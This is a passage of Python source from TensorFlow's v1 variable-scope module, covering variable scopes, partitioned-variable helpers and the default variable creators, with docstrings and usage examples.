%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
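For illustration, a hypothetical partitioner matching this contract (the name
`split_axis_1` is an assumption made for the example, and it assumes the
variable has at least two dimensions):
```python
def split_axis_1(shape, dtype):
  del dtype  # Unused here; only the shape matters for this sketch.
  partitions = [1] * len(shape)
  partitions[1] = 3  # Split into 3 shards along dimension 1.
  return partitions
```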
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True`, `None`, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables); here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Keep in mind that the counters for `default_name` are discarded once the
parent scope is exited. Therefore when the code re-enters the scope (for
instance by saving it), all nested default_name counters will be restarted.
For instance:
```python
with tf.compat.v1.variable_scope("foo") as vs:
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("a", [1])
assert v.name == "foo/bar/a:0", v.name
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("b", [1])
assert v.name == "foo/bar_1/b:0"
with tf.compat.v1.variable_scope(vs):
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("c", [1])
assert v.name == "foo/bar/c:0" # Uses bar instead of bar_2!
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scope names are generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`; this name will be uniquified. If `name_or_scope` is provided, this
argument is not used, so it is not required and can be `None`.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect once, when the scope is created. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(
name_scope, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
try:
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
try:
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg,
traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
    shape: shape of the `Tensor` to partition, must have at least one
      dimension.
    dtype: dtype of the elements in the `Tensor`.
  Returns:
    A list with elements >= 1 and at most one element > 1; the index of
    that element, if any, is the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_abc.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
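# Hedged sketch (not part of the original module): a small, never-called
# helper illustrating how the partitioning utilities above fit together.
# The name `_example_iter_slices` and the [20, 10] shape are illustrative.
def _example_iter_slices():
  """Partition a [20, 10] variable into 3 slices along axis 0."""
  slicing = [3, 1]  # e.g. what a fixed-size partitioner might return
  slice_dim, num_slices = _get_slice_dim_and_num_slices(slicing)  # (0, 3)
  # Yields ([0, 0], [7, 10]), ([7, 0], [7, 10]), ([14, 0], [6, 10]);
  # the 20 % 3 == 2 excess rows go to the first two slices.
  return list(_iter_slices([20, 10], num_slices, slice_dim))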
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
